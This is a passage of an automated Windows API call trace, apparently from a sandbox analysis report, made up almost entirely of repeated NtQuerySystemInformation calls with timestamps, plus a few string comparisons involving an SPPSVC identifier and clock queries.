(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f8, Length=0x50, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0227.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0227.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0227.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x20, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x28, ResultLength=0x0) [0227.713] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0227.714] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.723] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd670 | out: lpSystemTimeAsFileTime=0xc7520fd670*(dwLowDateTime=0xe9013f65, dwHighDateTime=0x1d5fb6e)) [0227.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd660, Length=0x28, ResultLength=0x0) [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0227.724] GetTickCount () returned 0x11797ed [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0227.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation 